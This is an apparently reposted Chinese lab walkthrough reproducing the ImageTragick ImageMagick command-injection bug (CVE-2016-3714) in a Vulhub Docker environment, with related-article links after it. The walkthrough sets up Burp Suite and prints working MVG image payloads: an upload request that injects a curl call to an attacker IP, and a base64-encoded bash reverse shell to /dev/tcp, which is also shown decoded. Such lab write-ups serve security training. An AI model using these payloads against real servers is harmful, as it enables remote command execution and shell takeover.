利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

2023-11-15

Vulnhub官方复现教程

https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md

漏洞原理

详情见 https://imagetragick.com/
或https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html

复现过程

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/imagemagick/imagetragick

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:3分钟
环境启动后,访问http://your-ip/可见有三个文件:

├── demo.php # 使用vul.jpg+identify命令测试 
├── upload.php # 支持用户进行上传,并将上传的文件传入PHP的imagick扩展,触发漏洞
└── vul.jpg # 一个简单的POC

在这里插入图片描述

漏洞复现

首先访问http://your-ip/demo.php
在这里插入图片描述
命令并没有回显,但在docker容器中,已经成功得到/tmp/success文件:

docker-compose exec apache cat /tmp/success

在这里插入图片描述

端口设置

浏览器设置

以火狐浏览器FireFox为例,在选项常规网络设置设置,将连接手动代理配置HTTP代理,填写127.0.0.1,端口为80
在这里插入图片描述

BurpSuit设置

ProxyOptionsProxy Listeners编辑监听端口为80
在这里插入图片描述
并将ProxyIntercept点击成Intercept is on

上传POC

再访问http://your-ip/upload.php测试,上传POC文件
一些测试使用的POC:https://github.com/ImageTragick/PoCs
比如

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/joker.jpg"|curl "your-ip:4444)'
pop graphic-context

将POC代码保存为.jpg文件的POC文件
数据包如下(注意,我换了一个POC):

POST /upload.php HTTP/1.1
Host: your-ip
Content-Length: 321
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Connection: close

-----------------------------293582696224464
Content-Disposition: form-data; name="file_upload"; filename="CVE-2016-3714.jpg"
Content-Type: image/jpeg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/joker.jpg"|curl "【your-ip】:3333)'
pop graphic-context
-----------------------------293582696224464--

监听3333端口

nc -lvnp 3333

发现your-ip:3333已经接收到http请求,【注意】修改IP,说明curl命令执行成功:
在这里插入图片描述

反弹shell POC

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjM2LjEzOC84ODg5IDA+JjE | base64 -d | bash`"||id " )'
pop graphic-context

在这里插入图片描述
【注意】echo后是经过base64编码/bin/bash -i >& /dev/tcp/192.168.236.138/8889 0>&1,请根据自己的IP地址更换base64编码
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714) 的相关文章

  • XXE漏洞原理--简单理解

    XXE漏洞简介 1 XXE漏洞全称XML External Entity Injection 即xmI外部实体注入漏洞 XXE漏洞发生在应用程序解析XML输入时 没有禁止外部实体的加载 导致可加载恶意外部文件 造成文件读取 命令执行 内网端
  • 利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)

    HTTPoxy漏洞 CVE 2016 5385 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 发出请求 Vulnhub官方复现教程 https vulhub org envi
  • 教你怎么用Vulnhub来搭建环境

    0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台 里面大部分的环境是要用VMware或者VirtualBox打开运行的 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场 妈妈再也不用担心我没有靶场练习了
  • Vulnhub靶机实战-Me-and-My-Girlfriend

    声明 好好学习 天天向上 搭建 使用virtualbox打开 网络和我的PRESIDENTIAL一样 是要vmware和virtualbox互连 渗透 存活扫描 发现目标 arp scan l 端口扫描 nmap T4 A 192 168
  • 跨站请求伪造CSRF(Cross-site request forgery)

    目录 一 什么是CSRF 二 可能存在CSRF攻击的三个条件 一个相关的动作 基于 Cookie 的会话处理 没有不可预测的请求参数 二 常见的CSRF攻击 1 CSRF令牌的验证取决与请求方法 2 CSRF令牌的验证取决与令牌是否存在 3
  • VulnHubBreach1.0[渗透测试]新手必看

    靶机下载地址 https download vulnhub com breach Breach 1 0 zip 前言 将下载好的靶场导入VMware 虚拟机设置网络模式为nat模式 即可开启渗透 阅读readme txt 作为多部分系列的第
  • 漏洞复现之CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

    1 1 1 漏洞描述 在2015年4月安全补丁日 微软发布的众多安全更新中 修复了HTTP sys中一处允许远程执行代码漏洞 编号为 CVE 2015 1635 MS15 034 利用HTTP sys的安全漏洞 攻击者只需要发送恶意的htt
  • 利用Vulnhub复现漏洞 - GoAhead 远程命令执行漏洞(CVE-2017-17562)

    GoAhead 远程命令执行漏洞 CVE 2017 17562 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 动态链接库源码 编译so文件 发送payload Vulnhub官方复现教程 https vulhub or
  • 利用Vulnhub复现漏洞 - Gogs 任意用户登录漏洞(CVE-2018-18925)

    Gogs 任意用户登录漏洞 CVE 2018 18925 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 失误原因 Vulnhub官方复现教程 https vulhub org environments gogs CVE
  • 渗透初识之DVWA靶场搭建及使用(详细图文)

    目录 环境搭建 一 下载DVWA 二 安装DVWA 三 DVWA 使用 环境搭建 我将环境搭在win7 漏洞环境建议还是在虚拟机上搭建 一 下载DVWA 下载地址 Buy Steroids Online UK Anabolic Steroi
  • 关于《Python黑帽子:黑客与渗透测试编程之道》的学习笔记

    本篇文章是学习 Python黑帽子 黑客与渗透测试编程之道 的笔记 会持续地将书上的代码自己敲一遍 从而让自己对Python的安全编程有更多的了解 同时希望各位可以给给建议 不足之处太多了 第一章 设置Python环境 Kali Linux
  • 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

    Imagetragick 命令执行漏洞 CVE 2016 3714 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 上传POC 反弹shell POC Vulnhub官方复现教
  • vulnhub靶机Looz

    下载地址 Looz 1 VulnHub 主机发现 arp scan l 端口扫描 nmap min rate 10000 p 192 168 21 155 扫描端口信息 nmap sV sT O p22 80 139 3306 8081 1
  • Vulnhub之Me-and-My-Girlfriend

    Vulnhub是一个很好的靶机平台 想看官网点这里 今天学习Me and My Girlfriend 点击这里下载哦 这个比较简单 入门学习 VMware和VirtualBox都可以导入 成功后如图 这里修改连接为NAT模式 然后就开始玩耍
  • 【Vulnhub】之symfonos1

    一 部署方法 在官网上下载靶机ova环境 https download vulnhub com symfonos symfonos1 7z 使用VMware搭建靶机环境 攻击机使用VMware上搭建的kali 靶机和攻击机之间使用NAT模式
  • XSS跨站脚本攻击(一)----XSS攻击的三种类型

    一 简介 什么是XSS 百度百科的解释 XSS又叫CSS Cross Site Script 跨站脚本攻击 它指的是恶意攻击者往Web页面里插入恶意html代码 当用户浏览该页之时 嵌入其中Web里面的html代码会被执行 从而达到恶意用户
  • [渗透]CVE-2020-1938/CNVD-2020-10487:Apache Tomcat AJP连接器远程执行代码漏洞

    受影响版本 Apache Tomcat 6 Apache Tomcat 7x lt 7 0 100 Apache Tomcat 8x lt 8 5 51 Apache Tomcat 9x lt 9 0 31 未受影响版本 Tomcat 7
  • POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

    安装010Editer 下载链接 http www pc6 com softview SoftView 55129 html 复制POC的十六进制 00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0
  • kali之vulhub,medium_socnet

    目录 一 部署环境 二 进行主机发现 arp scan进行扫描 三 使用nmap扫描发现的靶机IP 1 全端口扫描 看服务 2 查看端口所用服务版本 3 登录ip地址看一下 四 扫目录 dirsearch脚本 和windous御剑类似 1
  • The Planets:Venus

    靶场下载 The Planets Venus VulnHub 信息收集 arp scan l Interface eth0 type EN10MB MAC 00 0c 29 43 7c b1 IPv4 192 168 1 60 Starti

随机推荐

  • Python 搭建虚拟环境

    简介 实际开发中 我们为了防止python安装的包污染用户环境 比如你是root用户 利用pip安装后的包会放在root的python安装录中 很可能会影响root用户的其他操作 我们用root用户使用pip安装软件包后 linux环境会报
  • Django2.0-templates(1)-渲染模版方式和模版查找路径

    templates Django自带的是DTL Django Templates language DTL模版是一种带有特殊语法的HTML文件 该文件可以被Django编译 可以传递参数进去 实现数据动态化 编译完成后 生成一个普通的HTM
  • 如何安装elasticsearch分布式搜索引擎

    文章目录 安装elasticsearch 1 部署单点es 1 1 创建网络 1 2 下载镜像 1 3 运行 2 部署kibana 2 1 部署 2 2 安装中文 2 3 DevTools 3 安装IK分词器 3 1 在线安装ik插件 较慢
  • MQL5:zig-zag 指标

    Zig Zag 指标是用于描述高低点趋势的指标 MQL5 官方实现 MQL5 官方实现十分地烂 辣鸡 很多无用的变量 程序冗长 不一致 效率低下 感觉是多个菜鸟合作写出来的 有一些没有用的变量都没有删掉 不过 先来看看MQL5的官方实现 辅
  • 在ActiveX控件中如何动态调用DLL函数

    刚到公司不久 接到领导的下达的一个任务 就是把对POS机操作功能封装在ActiveX控件中 在IE中调用 这样就能实现在IE上直接对POS机进行操作 而我要封装的这个动态库 厂家只提供了一个单的动态库和一百多字的说明 也就是说明一下动态库中
  • vue笔记-inheritAttrs及$attr表示含义(一)

    一 引用官方解释 inheritAttrs 默认值true 在这种情况下父作用域的不被认作 props 的特性绑定 attribute bindings 将会 回退 且作为普通的 HTML 特性应用在子组件的根元素上 attr 包含了父作用
  • 服务器网站用绝对路径,云服务器上的绝对路径

    云服务器上的绝对路径 内容精选 换一换 已成功登录Java性能分析 待安装分析辅助软件的服务器已开启sshd Java性能分析优先选用非交互shell non interactive shell 中的JAVA HOME环境变量所指定的JRE
  • 关于iptables -m选项以及规则的理解

    关于iptables的详细状态可以查看http os 51cto com art 201108 285209 htm 时常在服务器的防火墙上看到有这些规则 2 106K 8294K ACCEPT all 0 0 0 0 0 0 0 0 0
  • 自定义Switch背景带文字

    需要实现的效果 标题代码实现 div class custom switch span class custom left 关灯 span div class switch btn div span class custom right 开
  • mysql thread_MySQL thread_stack连接线程的优化

    MySQL连接不仅能通过网络方式 还可以通过命名管道的方式 不论是哪种方式连接MySQL 在MySQL中都是通过线程的方式管理所有客户端请求的 每一个客户端连接都会有一个与之对应的连接线程 在MySQL中实现了一个Thread Cache池
  • MySQL8高级优化,持续更新......

    索引 索引可以高效获取数据 避免对数据进行全盘扫描 查询速度很慢 索引就是一种数据结构 树 MySQL官方对索引的定义为 索引 index 是帮助MySQL高效获取数据的数据结构 有序 在数据之外 数据库系统还维护者满足特定查找算法的数据结
  • python 线性回归 统计检验 p值_使用Python进行统计建模

    点击上方 早起python 关注早起 和我一起 成为更好的自己 前言 大家好 在 之前的文章中 我们已经讲解了很多Python数据处理的方法比如 读取数据 缺失值处理 数据降维等 也介绍了一些数据可视化的方法如 Matplotlib pye
  • 电脑出现不停刷新即Windows资源管理器不停重启的情况(win10)

    电脑出现不停刷新即Windows资源管理器不停重启的情况 win10 一 现象 电脑出现不停刷新的情况 打开任务管理器发现 Windows资源管理器 进程占用很高的CPU又降下去 反复出现 二 解决方案 1 win R 在输入框中输入reg
  • PhD新生规划知乎、一亩三分地观点摘抄

    1 thesis 68 封私信 80 条消息 对 PhD 一年级新生有什么建议 知乎 zhihu com 我觉得一个优秀的phd应该是这样的 整个phd期间就发有限的几篇 然后这几篇文章就像沙滩上的脚印一样 围成了一个圈或者一个区域 这个圈
  • 解决uniapp 报错 chunk-vendors.js:25968 GET http://localhost:8080/sockjs-node/info?t=15996357

    在目录中新建一个package lock json 然后在里面添加 sockjs dev false sockjs client dev false
  • FISCO BCOS 一、搭建第一个区块链网络(及配置控制台)

    1 搭建单群组FISCO BCOS联盟链 本节以搭建单群组FISCO BCOS链为例操作 使用开发部署工具 build chain sh脚本在本地搭建一条4 节点的FISCO BCOS链 这里我用的是ubuntu20 04 第一步 安装依赖
  • 异或的巧妙用法(比较数字是否相同/独数)

    比较两个数是否相同或者在数组 该数组同一个相同数最多2个 中找出一个单独出现的数字 我们可以用异或的方法来巧妙的解决 C 代码 class Solution public int singleNumber vector
  • 《深度学习500问》一份超全深度学习资料,面试必备!

    给大家推荐一本还未完成的深度学习书籍 深度学习500问 为什么要推荐一本未完成的书 首先 这本书的作者是通过问答的形式 对常用的概率知识 线性代数 机器学习 深度学习 计算机视觉等热点问题进行阐述 清晰明了 方便检索 特别适合初学者 其次
  • Python3 PyQt5 实现文件打开及保存

    coding utf 8 Form implementation generated from reading ui file filemanage ui Created by PyQt5 UI code generator 5 12 2
  • 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

    Imagetragick 命令执行漏洞 CVE 2016 3714 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 上传POC 反弹shell POC Vulnhub官方复现教